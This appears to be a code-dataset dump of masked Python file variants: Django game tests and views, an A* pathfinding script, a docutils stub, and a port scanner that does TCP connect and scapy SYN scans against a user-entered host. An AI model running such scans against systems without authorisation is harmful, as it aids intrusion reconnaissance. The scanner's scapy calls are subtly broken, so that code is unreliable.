"step-5": "from django.test import TestCase\nfrom .models import Seller, Product\nfrom rest_framework.test import APIClient\nimport json\n\n\nclass SellerModelTests(TestCase):\n\n def test_class_str(self):\n seller = Seller()\n seller.name = \"Bruna\"\n\n self.assertEquals(seller.__str__(), \"Bruna\")\n\n def test_to_dict(self):\n seller = Seller()\n seller.name = \"Bruna\"\n seller.email = \"bruna@example.com\"\n\n result_seller = {\n \"id\": None,\n \"name\": \"Bruna\",\n \"email\": \"bruna@example.com\"\n }\n\n self.assertEquals(seller.to_dict(), result_seller)\n\n def test_class_str_without_name(self):\n seller = Seller()\n self.assertEqual(seller.__str__(), \"\")\n\n\nclass ProductModelTests(TestCase):\n\n def product_class_str(self):\n product = Product()\n product.name = \"Cadeira\"\n\n self.assertEquals(product.__str__(), \"Cadeira\")\n\n def product_to_dict(self):\n product = Product()\n product.name = \"Cadeira\"\n product.price = 2000\n product.seller = \"Bruna\"\n product.quantity = 10\n product.status = \"Active\"\n\n result_product = {\n \"id\": None,\n \"name\": \"Cadeira\",\n \"price\": 2000,\n \"seller\": \"Bruna\",\n \"quantity\": 10,\n \"status\": \"Active\"\n\n }\n\n self.assertEquals(product.to_dict(), result_product)\n\n\nclass SellerViewTests(TestCase):\n @classmethod\n def setUpTestData(cls):\n Seller.objects.create(name=\"Bruna\", email=\"bruna@example.com\")\n\n def test_get(self):\n client = APIClient()\n response = client.get('/produtos/sellers/')\n\n self.assertEqual(response.status_code, 200)\n\n data = json.loads(response.content)\n\n self.assertEqual(data.get('count'), 1)\n\n seller_first = data.get('results')[0]\n\n self.assertEqual(seller_first.get(\"name\"), \"Bruna\")\n self.assertEqual(seller_first.get(\"email\"), \"bruna@example.com\")\n\n def test_post(self):\n client = APIClient()\n response = client.post('/produtos/sellers/', {\n \"name\": \"Bruna\",\n \"email\": \"bruna@example.com\"\n })\n\n self.assertEqual(response.status_code, 201)\n self.assertEquals(Seller.objects.count(), 2)\n self.assertEquals(Seller.objects.last().name, \"Bruna\")\n\n\nclass ProductViewTests(TestCase):\n @classmethod\n def setUpTestData(cls):\n Product.objects.create(name=\"Cadeira\", price=250, quantity=2, status=\"Active\")\n\n def test_get(self):\n client = APIClient()\n response = client.get('/produtos/')\n\n self.assertEqual(response.status_code, 200)\n\n data = json.loads(response.content)\n self.assertEqual(data.get('count'), 1)\n\n product_first = data.get('results')[0]\n\n self.assertEqual(product_first.get(\"name\"), \"Cadeira\")\n self.assertEqual(product_first.get(\"price\"), 250)\n self.assertEqual(product_first.get(\"quantity\"), 2)\n self.assertEqual(product_first.get(\"status\"), \"Active\")\n\n def test_post(self):\n client = APIClient()\n response = client.post('/produtos/', {\n \"name\": \"Mesa\",\n \"price\": 300,\n \"quantity\": 2,\n \"status\": \"ACTIVE\"\n })\n\n self.assertEqual(response.status_code, 201)\n self.assertEquals(Product.objects.count(), 2)\n self.assertEquals(Product.objects.last().name, \"Mesa\")\n",
"step-ids": [
9,
10,
13,
16,
17
]
}
|
[
9,
10,
13,
16,
17
] |
from django.shortcuts import render, redirect
from .game import run
from .models import Match
from team.models import Team, Player
from django.urls import reverse
# Create your views here.
def startgame(request):
match = Match(team1_pk = 1, team2_pk = 2)
team1 = Team.objects.get(pk = match.team1_pk)
team2 = Team.objects.get(pk = match.team2_pk)
player1 = Player.objects.get(pk = match.team1_pk * 5 - 4)
player2 = Player.objects.get(pk = match.team1_pk * 5 - 3)
player3 = Player.objects.get(pk = match.team1_pk * 5 - 2)
player4 = Player.objects.get(pk = match.team1_pk * 5 - 1)
player5 = Player.objects.get(pk = match.team1_pk * 5 - 0)
player6 = Player.objects.get(pk = match.team2_pk * 5 - 4)
player7 = Player.objects.get(pk = match.team2_pk * 5 - 3)
player8 = Player.objects.get(pk = match.team2_pk * 5 - 2)
player9 = Player.objects.get(pk = match.team2_pk * 5 - 1)
player10 = Player.objects.get(pk = match.team2_pk * 5 - 0)
team1list = [player1, player2, player3, player4, player5]
team2list = [player6, player7, player8, player9, player10]
return render(request, 'match/startgame.html', {'team1': team1, 'team2': team2, 'team1list': team1list, 'team2list': team2list})
def results(request):
team1damage = 0
team2damage = 0
winner = run(1, 2)
team1 = Team.objects.get(pk = 1)
team2 = Team.objects.get(pk = 2)
player1 = Player.objects.get(pk = 1)
player2 = Player.objects.get(pk = 2)
player3 = Player.objects.get(pk = 3)
player4 = Player.objects.get(pk = 4)
player5 = Player.objects.get(pk = 5)
player6 = Player.objects.get(pk = 6)
player7 = Player.objects.get(pk = 7)
player8 = Player.objects.get(pk = 8)
player9 = Player.objects.get(pk = 9)
player10 = Player.objects.get(pk = 10)
team1list = [player1, player2, player3, player4, player5]
team2list = [player6, player7, player8, player9, player10]
for i in range(5):
team1damage += team1list[i].damage_dealt
team2damage += team2list[i].damage_dealt
team1damage = round(team1damage, 2)
team2damage = round(team2damage, 2)
team1hp = round(500.0 - team2damage, 2)
if team1hp <= 0.0:
team1hp = 0.0
team2hp = round(500.0 - team1damage, 2)
if team2hp <= 0.0:
team2hp = 0.0
return render(request, 'match/results.html', {'team1': team1, 'team2': team2, 'team1list': team1list, 'team2list': team2list, 'winner': winner, 'team1damage': team1damage, 'team2damage': team2damage, 'team1hp': team1hp, 'team2hp': team2hp})
|
normal
|
{
"blob_id": "e1829904cea51909b3a1729b9a18d40872e7c13c",
"index": 6163,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef results(request):\n team1damage = 0\n team2damage = 0\n winner = run(1, 2)\n team1 = Team.objects.get(pk=1)\n team2 = Team.objects.get(pk=2)\n player1 = Player.objects.get(pk=1)\n player2 = Player.objects.get(pk=2)\n player3 = Player.objects.get(pk=3)\n player4 = Player.objects.get(pk=4)\n player5 = Player.objects.get(pk=5)\n player6 = Player.objects.get(pk=6)\n player7 = Player.objects.get(pk=7)\n player8 = Player.objects.get(pk=8)\n player9 = Player.objects.get(pk=9)\n player10 = Player.objects.get(pk=10)\n team1list = [player1, player2, player3, player4, player5]\n team2list = [player6, player7, player8, player9, player10]\n for i in range(5):\n team1damage += team1list[i].damage_dealt\n team2damage += team2list[i].damage_dealt\n team1damage = round(team1damage, 2)\n team2damage = round(team2damage, 2)\n team1hp = round(500.0 - team2damage, 2)\n if team1hp <= 0.0:\n team1hp = 0.0\n team2hp = round(500.0 - team1damage, 2)\n if team2hp <= 0.0:\n team2hp = 0.0\n return render(request, 'match/results.html', {'team1': team1, 'team2':\n team2, 'team1list': team1list, 'team2list': team2list, 'winner':\n winner, 'team1damage': team1damage, 'team2damage': team2damage,\n 'team1hp': team1hp, 'team2hp': team2hp})\n",
"step-3": "<mask token>\n\n\ndef startgame(request):\n match = Match(team1_pk=1, team2_pk=2)\n team1 = Team.objects.get(pk=match.team1_pk)\n team2 = Team.objects.get(pk=match.team2_pk)\n player1 = Player.objects.get(pk=match.team1_pk * 5 - 4)\n player2 = Player.objects.get(pk=match.team1_pk * 5 - 3)\n player3 = Player.objects.get(pk=match.team1_pk * 5 - 2)\n player4 = Player.objects.get(pk=match.team1_pk * 5 - 1)\n player5 = Player.objects.get(pk=match.team1_pk * 5 - 0)\n player6 = Player.objects.get(pk=match.team2_pk * 5 - 4)\n player7 = Player.objects.get(pk=match.team2_pk * 5 - 3)\n player8 = Player.objects.get(pk=match.team2_pk * 5 - 2)\n player9 = Player.objects.get(pk=match.team2_pk * 5 - 1)\n player10 = Player.objects.get(pk=match.team2_pk * 5 - 0)\n team1list = [player1, player2, player3, player4, player5]\n team2list = [player6, player7, player8, player9, player10]\n return render(request, 'match/startgame.html', {'team1': team1, 'team2':\n team2, 'team1list': team1list, 'team2list': team2list})\n\n\ndef results(request):\n team1damage = 0\n team2damage = 0\n winner = run(1, 2)\n team1 = Team.objects.get(pk=1)\n team2 = Team.objects.get(pk=2)\n player1 = Player.objects.get(pk=1)\n player2 = Player.objects.get(pk=2)\n player3 = Player.objects.get(pk=3)\n player4 = Player.objects.get(pk=4)\n player5 = Player.objects.get(pk=5)\n player6 = Player.objects.get(pk=6)\n player7 = Player.objects.get(pk=7)\n player8 = Player.objects.get(pk=8)\n player9 = Player.objects.get(pk=9)\n player10 = Player.objects.get(pk=10)\n team1list = [player1, player2, player3, player4, player5]\n team2list = [player6, player7, player8, player9, player10]\n for i in range(5):\n team1damage += team1list[i].damage_dealt\n team2damage += team2list[i].damage_dealt\n team1damage = round(team1damage, 2)\n team2damage = round(team2damage, 2)\n team1hp = round(500.0 - team2damage, 2)\n if team1hp <= 0.0:\n team1hp = 0.0\n team2hp = round(500.0 - team1damage, 2)\n if team2hp <= 0.0:\n team2hp = 0.0\n return render(request, 'match/results.html', {'team1': team1, 'team2':\n team2, 'team1list': team1list, 'team2list': team2list, 'winner':\n winner, 'team1damage': team1damage, 'team2damage': team2damage,\n 'team1hp': team1hp, 'team2hp': team2hp})\n",
"step-4": "from django.shortcuts import render, redirect\nfrom .game import run\nfrom .models import Match\nfrom team.models import Team, Player\nfrom django.urls import reverse\n\n\ndef startgame(request):\n match = Match(team1_pk=1, team2_pk=2)\n team1 = Team.objects.get(pk=match.team1_pk)\n team2 = Team.objects.get(pk=match.team2_pk)\n player1 = Player.objects.get(pk=match.team1_pk * 5 - 4)\n player2 = Player.objects.get(pk=match.team1_pk * 5 - 3)\n player3 = Player.objects.get(pk=match.team1_pk * 5 - 2)\n player4 = Player.objects.get(pk=match.team1_pk * 5 - 1)\n player5 = Player.objects.get(pk=match.team1_pk * 5 - 0)\n player6 = Player.objects.get(pk=match.team2_pk * 5 - 4)\n player7 = Player.objects.get(pk=match.team2_pk * 5 - 3)\n player8 = Player.objects.get(pk=match.team2_pk * 5 - 2)\n player9 = Player.objects.get(pk=match.team2_pk * 5 - 1)\n player10 = Player.objects.get(pk=match.team2_pk * 5 - 0)\n team1list = [player1, player2, player3, player4, player5]\n team2list = [player6, player7, player8, player9, player10]\n return render(request, 'match/startgame.html', {'team1': team1, 'team2':\n team2, 'team1list': team1list, 'team2list': team2list})\n\n\ndef results(request):\n team1damage = 0\n team2damage = 0\n winner = run(1, 2)\n team1 = Team.objects.get(pk=1)\n team2 = Team.objects.get(pk=2)\n player1 = Player.objects.get(pk=1)\n player2 = Player.objects.get(pk=2)\n player3 = Player.objects.get(pk=3)\n player4 = Player.objects.get(pk=4)\n player5 = Player.objects.get(pk=5)\n player6 = Player.objects.get(pk=6)\n player7 = Player.objects.get(pk=7)\n player8 = Player.objects.get(pk=8)\n player9 = Player.objects.get(pk=9)\n player10 = Player.objects.get(pk=10)\n team1list = [player1, player2, player3, player4, player5]\n team2list = [player6, player7, player8, player9, player10]\n for i in range(5):\n team1damage += team1list[i].damage_dealt\n team2damage += team2list[i].damage_dealt\n team1damage = round(team1damage, 2)\n team2damage = round(team2damage, 2)\n team1hp = round(500.0 - team2damage, 2)\n if team1hp <= 0.0:\n team1hp = 0.0\n team2hp = round(500.0 - team1damage, 2)\n if team2hp <= 0.0:\n team2hp = 0.0\n return render(request, 'match/results.html', {'team1': team1, 'team2':\n team2, 'team1list': team1list, 'team2list': team2list, 'winner':\n winner, 'team1damage': team1damage, 'team2damage': team2damage,\n 'team1hp': team1hp, 'team2hp': team2hp})\n",
"step-5": "from django.shortcuts import render, redirect\nfrom .game import run\nfrom .models import Match\nfrom team.models import Team, Player\nfrom django.urls import reverse\n\n# Create your views here.\n\ndef startgame(request):\n match = Match(team1_pk = 1, team2_pk = 2)\n\n team1 = Team.objects.get(pk = match.team1_pk)\n team2 = Team.objects.get(pk = match.team2_pk)\n\n player1 = Player.objects.get(pk = match.team1_pk * 5 - 4)\n player2 = Player.objects.get(pk = match.team1_pk * 5 - 3)\n player3 = Player.objects.get(pk = match.team1_pk * 5 - 2)\n player4 = Player.objects.get(pk = match.team1_pk * 5 - 1)\n player5 = Player.objects.get(pk = match.team1_pk * 5 - 0)\n player6 = Player.objects.get(pk = match.team2_pk * 5 - 4)\n player7 = Player.objects.get(pk = match.team2_pk * 5 - 3)\n player8 = Player.objects.get(pk = match.team2_pk * 5 - 2)\n player9 = Player.objects.get(pk = match.team2_pk * 5 - 1)\n player10 = Player.objects.get(pk = match.team2_pk * 5 - 0)\n\n team1list = [player1, player2, player3, player4, player5]\n team2list = [player6, player7, player8, player9, player10]\n \n return render(request, 'match/startgame.html', {'team1': team1, 'team2': team2, 'team1list': team1list, 'team2list': team2list})\n\ndef results(request):\n team1damage = 0\n team2damage = 0\n\n winner = run(1, 2)\n \n team1 = Team.objects.get(pk = 1)\n team2 = Team.objects.get(pk = 2)\n \n player1 = Player.objects.get(pk = 1)\n player2 = Player.objects.get(pk = 2)\n player3 = Player.objects.get(pk = 3)\n player4 = Player.objects.get(pk = 4)\n player5 = Player.objects.get(pk = 5)\n player6 = Player.objects.get(pk = 6)\n player7 = Player.objects.get(pk = 7)\n player8 = Player.objects.get(pk = 8)\n player9 = Player.objects.get(pk = 9)\n player10 = Player.objects.get(pk = 10)\n \n team1list = [player1, player2, player3, player4, player5]\n team2list = [player6, player7, player8, player9, player10]\n \n for i in range(5):\n team1damage += team1list[i].damage_dealt\n team2damage += team2list[i].damage_dealt\n\n team1damage = round(team1damage, 2)\n team2damage = round(team2damage, 2)\n\n team1hp = round(500.0 - team2damage, 2)\n if team1hp <= 0.0: \n team1hp = 0.0\n\n team2hp = round(500.0 - team1damage, 2)\n if team2hp <= 0.0:\n team2hp = 0.0\n\n return render(request, 'match/results.html', {'team1': team1, 'team2': team2, 'team1list': team1list, 'team2list': team2list, 'winner': winner, 'team1damage': team1damage, 'team2damage': team2damage, 'team1hp': team1hp, 'team2hp': team2hp})",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from AStar import astar
def main():
grid = [[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 1, 0, 0, 0, 0, 0],
[0, 1, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]
start = (0, 0)
end = (8, 9)
path = astar(grid, start, end)
print(path)
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "ba483c7eaf2f2ced7f70a14b53c781f190585024",
"index": 1257,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n grid = [[0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 1, 0, 0, 0, 0, 0], [0,\n 0, 0, 0, 1, 0, 0, 0, 0, 0], [1, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, \n 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 1, 0, 0, 0], [0, 0, 0, \n 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]\n start = 0, 0\n end = 8, 9\n path = astar(grid, start, end)\n print(path)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n grid = [[0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 1, 0, 0, 0, 0, 0], [0,\n 0, 0, 0, 1, 0, 0, 0, 0, 0], [1, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, \n 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 1, 0, 0, 0], [0, 0, 0, \n 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]\n start = 0, 0\n end = 8, 9\n path = astar(grid, start, end)\n print(path)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from AStar import astar\n\n\ndef main():\n grid = [[0, 0, 0, 0, 1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0, 0, 0, 0, 0], [0, 1, 0, 0, 1, 0, 0, 0, 0, 0], [0,\n 0, 0, 0, 1, 0, 0, 0, 0, 0], [1, 0, 0, 0, 0, 0, 0, 0, 0, 0], [0, 0, \n 0, 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 1, 0, 1, 0, 0, 0], [0, 0, 0, \n 0, 1, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]\n start = 0, 0\n end = 8, 9\n path = astar(grid, start, end)\n print(path)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from AStar import astar\n\n\ndef main():\n grid = [[0, 0, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 1, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 1, 0, 0, 0, 0, 0],\n [0, 1, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 1, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]]\n\n start = (0, 0)\n end = (8, 9)\n\n path = astar(grid, start, end)\n print(path)\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Original code from http://www.pythonforbeginners.com/code-snippets-source-code/port-scanner-in-python
#!/usr/bin/env python
# modules
import threading
import socket
import subprocess
import sys
import time
import scapy
from threading import Thread, Lock
from queue import Queue
from datetime import datetime
from logging import getLogger, ERROR
getLogger("scapy.runtime") .setLevel (ERROR)
from scapy.all import *
subprocess.call('clear', shell=True)
# print_lock = threading.Lock() - WIP, threading not implemented yet.
# Enter target host and port range
target = input("Enter a remote host to scan: ")
targetIP = socket.gethostbyname(target)
startPort = int(input("Enter the start port to scan: "))
endPort = int(input("Enter the end port to scan: "))
# Setting some values
ports = range(int(startPort), int(endPort)+1)
t1 = datetime.now()
SYNACK = 0x12
RSTACK = 0x14
# Banner displaying which host is being scanned
print ("-" * 60)
print ("Please wait, scanning remote host...", targetIP)
localtime = time.asctime(time.localtime())
print ("Scan started at: ", localtime)
def checkhost(ip):
conf.verb = 0
try:
ping = sr1(IP(dst = ip)/ICMP())
print ("\n[*] Target is up, beginning scan...") #this text isn't displayed - why?
except Exception:
print ("\n[!] Couldn't resolve target")
sys.exit("Exiting...")
print ("-" * 60)
def scanport(port):
startPort = RandShort() # scapy func that generates a small random nr to use as a source port.
conf.verb = 0 # prevents output from sending pkts from being printed to the screen.
SYNACKpkt = sr1(IP(dst = target)/TCP(sport = startPort, endPort = port, flags = "S")) # Scapy func sr1() used to craft & send a SYN pkt .
pktflags = SYNACKpkt.getlayer(TCP).flags
if pktflags == SYNACK:
return True
else:
return False
RSTpkt = IP(dst = target)/TCP(sport = startPort, endPort = port, flags = "R")
send(RSTpkt)
# Error handling
try:
for port in range(int(startPort), int(endPort)+1):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((targetIP, port))
if result == 0:
print ("Port {}: [+] Open".format(port))
elif result != 0:
print ("Port {}: [-] Closed".format(port))
sock.close()
except KeyboardInterrupt:
sys.exit("You pressed Ctrl+C")
except socket.gaierror:
sys.exit("Hostname could not be resolved. Exiting")
except socket.error:
sys.exit("Couldn't connect to server")
t2 = datetime.now()
# Calculates the difference in time, to see how long it took to run the script
total = t2 - t1
print ("-" * 60)
print ("Scanning Completed in: ", total)
|
normal
|
{
"blob_id": "7e0eefb1d913787f675adc2ba0dccb16007464e4",
"index": 1764,
"step-1": "<mask token>\n\n\ndef checkhost(ip):\n conf.verb = 0\n try:\n ping = sr1(IP(dst=ip) / ICMP())\n print('\\n[*] Target is up, beginning scan...')\n except Exception:\n print(\"\\n[!] Couldn't resolve target\")\n sys.exit('Exiting...')\n\n\n<mask token>\n\n\ndef scanport(port):\n startPort = RandShort()\n conf.verb = 0\n SYNACKpkt = sr1(IP(dst=target) / TCP(sport=startPort, endPort=port,\n flags='S'))\n pktflags = SYNACKpkt.getlayer(TCP).flags\n if pktflags == SYNACK:\n return True\n else:\n return False\n RSTpkt = IP(dst=target) / TCP(sport=startPort, endPort=port, flags='R')\n send(RSTpkt)\n\n\n<mask token>\n",
"step-2": "<mask token>\ngetLogger('scapy.runtime').setLevel(ERROR)\n<mask token>\nsubprocess.call('clear', shell=True)\n<mask token>\nprint('-' * 60)\nprint('Please wait, scanning remote host...', targetIP)\n<mask token>\nprint('Scan started at: ', localtime)\n\n\ndef checkhost(ip):\n conf.verb = 0\n try:\n ping = sr1(IP(dst=ip) / ICMP())\n print('\\n[*] Target is up, beginning scan...')\n except Exception:\n print(\"\\n[!] Couldn't resolve target\")\n sys.exit('Exiting...')\n\n\nprint('-' * 60)\n\n\ndef scanport(port):\n startPort = RandShort()\n conf.verb = 0\n SYNACKpkt = sr1(IP(dst=target) / TCP(sport=startPort, endPort=port,\n flags='S'))\n pktflags = SYNACKpkt.getlayer(TCP).flags\n if pktflags == SYNACK:\n return True\n else:\n return False\n RSTpkt = IP(dst=target) / TCP(sport=startPort, endPort=port, flags='R')\n send(RSTpkt)\n\n\ntry:\n for port in range(int(startPort), int(endPort) + 1):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result = sock.connect_ex((targetIP, port))\n if result == 0:\n print('Port {}: [+] Open'.format(port))\n elif result != 0:\n print('Port {}: [-] Closed'.format(port))\n sock.close()\nexcept KeyboardInterrupt:\n sys.exit('You pressed Ctrl+C')\nexcept socket.gaierror:\n sys.exit('Hostname could not be resolved. Exiting')\nexcept socket.error:\n sys.exit(\"Couldn't connect to server\")\n<mask token>\nprint('-' * 60)\nprint('Scanning Completed in: ', total)\n",
"step-3": "<mask token>\ngetLogger('scapy.runtime').setLevel(ERROR)\n<mask token>\nsubprocess.call('clear', shell=True)\ntarget = input('Enter a remote host to scan: ')\ntargetIP = socket.gethostbyname(target)\nstartPort = int(input('Enter the start port to scan: '))\nendPort = int(input('Enter the end port to scan: '))\nports = range(int(startPort), int(endPort) + 1)\nt1 = datetime.now()\nSYNACK = 18\nRSTACK = 20\nprint('-' * 60)\nprint('Please wait, scanning remote host...', targetIP)\nlocaltime = time.asctime(time.localtime())\nprint('Scan started at: ', localtime)\n\n\ndef checkhost(ip):\n conf.verb = 0\n try:\n ping = sr1(IP(dst=ip) / ICMP())\n print('\\n[*] Target is up, beginning scan...')\n except Exception:\n print(\"\\n[!] Couldn't resolve target\")\n sys.exit('Exiting...')\n\n\nprint('-' * 60)\n\n\ndef scanport(port):\n startPort = RandShort()\n conf.verb = 0\n SYNACKpkt = sr1(IP(dst=target) / TCP(sport=startPort, endPort=port,\n flags='S'))\n pktflags = SYNACKpkt.getlayer(TCP).flags\n if pktflags == SYNACK:\n return True\n else:\n return False\n RSTpkt = IP(dst=target) / TCP(sport=startPort, endPort=port, flags='R')\n send(RSTpkt)\n\n\ntry:\n for port in range(int(startPort), int(endPort) + 1):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result = sock.connect_ex((targetIP, port))\n if result == 0:\n print('Port {}: [+] Open'.format(port))\n elif result != 0:\n print('Port {}: [-] Closed'.format(port))\n sock.close()\nexcept KeyboardInterrupt:\n sys.exit('You pressed Ctrl+C')\nexcept socket.gaierror:\n sys.exit('Hostname could not be resolved. Exiting')\nexcept socket.error:\n sys.exit(\"Couldn't connect to server\")\nt2 = datetime.now()\ntotal = t2 - t1\nprint('-' * 60)\nprint('Scanning Completed in: ', total)\n",
"step-4": "import threading\nimport socket\nimport subprocess\nimport sys\nimport time\nimport scapy\nfrom threading import Thread, Lock\nfrom queue import Queue\nfrom datetime import datetime\nfrom logging import getLogger, ERROR\ngetLogger('scapy.runtime').setLevel(ERROR)\nfrom scapy.all import *\nsubprocess.call('clear', shell=True)\ntarget = input('Enter a remote host to scan: ')\ntargetIP = socket.gethostbyname(target)\nstartPort = int(input('Enter the start port to scan: '))\nendPort = int(input('Enter the end port to scan: '))\nports = range(int(startPort), int(endPort) + 1)\nt1 = datetime.now()\nSYNACK = 18\nRSTACK = 20\nprint('-' * 60)\nprint('Please wait, scanning remote host...', targetIP)\nlocaltime = time.asctime(time.localtime())\nprint('Scan started at: ', localtime)\n\n\ndef checkhost(ip):\n conf.verb = 0\n try:\n ping = sr1(IP(dst=ip) / ICMP())\n print('\\n[*] Target is up, beginning scan...')\n except Exception:\n print(\"\\n[!] Couldn't resolve target\")\n sys.exit('Exiting...')\n\n\nprint('-' * 60)\n\n\ndef scanport(port):\n startPort = RandShort()\n conf.verb = 0\n SYNACKpkt = sr1(IP(dst=target) / TCP(sport=startPort, endPort=port,\n flags='S'))\n pktflags = SYNACKpkt.getlayer(TCP).flags\n if pktflags == SYNACK:\n return True\n else:\n return False\n RSTpkt = IP(dst=target) / TCP(sport=startPort, endPort=port, flags='R')\n send(RSTpkt)\n\n\ntry:\n for port in range(int(startPort), int(endPort) + 1):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result = sock.connect_ex((targetIP, port))\n if result == 0:\n print('Port {}: [+] Open'.format(port))\n elif result != 0:\n print('Port {}: [-] Closed'.format(port))\n sock.close()\nexcept KeyboardInterrupt:\n sys.exit('You pressed Ctrl+C')\nexcept socket.gaierror:\n sys.exit('Hostname could not be resolved. Exiting')\nexcept socket.error:\n sys.exit(\"Couldn't connect to server\")\nt2 = datetime.now()\ntotal = t2 - t1\nprint('-' * 60)\nprint('Scanning Completed in: ', total)\n",
"step-5": "# Original code from http://www.pythonforbeginners.com/code-snippets-source-code/port-scanner-in-python\n#!/usr/bin/env python\n\n# modules\nimport threading\nimport socket\nimport subprocess\nimport sys\nimport time\nimport scapy\n\nfrom threading import Thread, Lock\nfrom queue import Queue\nfrom datetime import datetime\nfrom logging import getLogger, ERROR\ngetLogger(\"scapy.runtime\") .setLevel (ERROR)\nfrom scapy.all import *\n\nsubprocess.call('clear', shell=True)\n\n# print_lock = threading.Lock() - WIP, threading not implemented yet.\n\n# Enter target host and port range\ntarget = input(\"Enter a remote host to scan: \")\ntargetIP = socket.gethostbyname(target)\nstartPort = int(input(\"Enter the start port to scan: \"))\nendPort = int(input(\"Enter the end port to scan: \"))\n\n# Setting some values\nports = range(int(startPort), int(endPort)+1)\nt1 = datetime.now()\nSYNACK = 0x12\nRSTACK = 0x14\n\n# Banner displaying which host is being scanned\nprint (\"-\" * 60)\nprint (\"Please wait, scanning remote host...\", targetIP)\nlocaltime = time.asctime(time.localtime())\nprint (\"Scan started at: \", localtime)\ndef checkhost(ip):\n conf.verb = 0\n try:\n ping = sr1(IP(dst = ip)/ICMP())\n print (\"\\n[*] Target is up, beginning scan...\") #this text isn't displayed - why?\n except Exception:\n print (\"\\n[!] Couldn't resolve target\")\n sys.exit(\"Exiting...\")\nprint (\"-\" * 60)\n\ndef scanport(port):\n startPort = RandShort() # scapy func that generates a small random nr to use as a source port.\n conf.verb = 0 # prevents output from sending pkts from being printed to the screen.\n SYNACKpkt = sr1(IP(dst = target)/TCP(sport = startPort, endPort = port, flags = \"S\")) # Scapy func sr1() used to craft & send a SYN pkt .\n pktflags = SYNACKpkt.getlayer(TCP).flags\n if pktflags == SYNACK:\n return True\n else:\n return False\n RSTpkt = IP(dst = target)/TCP(sport = startPort, endPort = port, flags = \"R\")\n send(RSTpkt)\n\n\n# Error handling\ntry:\n for port in range(int(startPort), int(endPort)+1):\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n result = sock.connect_ex((targetIP, port))\n if result == 0:\n print (\"Port {}: [+] Open\".format(port))\n elif result != 0:\n print (\"Port {}: [-] Closed\".format(port))\n sock.close()\n\nexcept KeyboardInterrupt:\n sys.exit(\"You pressed Ctrl+C\")\n\nexcept socket.gaierror:\n sys.exit(\"Hostname could not be resolved. Exiting\")\n\nexcept socket.error:\n sys.exit(\"Couldn't connect to server\")\n\nt2 = datetime.now()\n\n# Calculates the difference in time, to see how long it took to run the script\ntotal = t2 - t1\nprint (\"-\" * 60)\nprint (\"Scanning Completed in: \", total)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# Stubs for docutils.parsers.rst.directives.tables (Python 3.6)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
import csv
from docutils.statemachine import StringList
from docutils.nodes import Node, system_message, table, title
from docutils.parsers.rst import Directive
from typing import Any, Callable, Dict, List, Tuple, TypeVar
N_co = TypeVar('N_co', bound=Node, covariant=True)
__docformat__: str
def align(argument: str) -> str: ...
class Table(Directive):
optional_arguments: int = ...
final_argument_whitespace: bool = ...
option_spec: Dict[str, Callable[[str], Any]] = ...
has_content: bool = ...
def make_title(self) -> Tuple[title, List[system_message]]: ...
def process_header_option(self) -> Tuple[List[Node], int]: ...
def check_table_dimensions(self, rows: List[List[N_co]], header_rows: int, stub_columns: int) -> None: ...
def set_table_width(self, table_node: table) -> None: ...
@property
def widths(self) -> str: ...
def get_column_widths(self, max_cols: int) -> List[int]: ...
def extend_short_rows_with_empty_cells(self, columns: int, parts: Tuple[List[N_co], List[N_co]]) -> None: ...
class RSTTable(Table):
def run(self) -> List[Node]: ...
class CSVTable(Table):
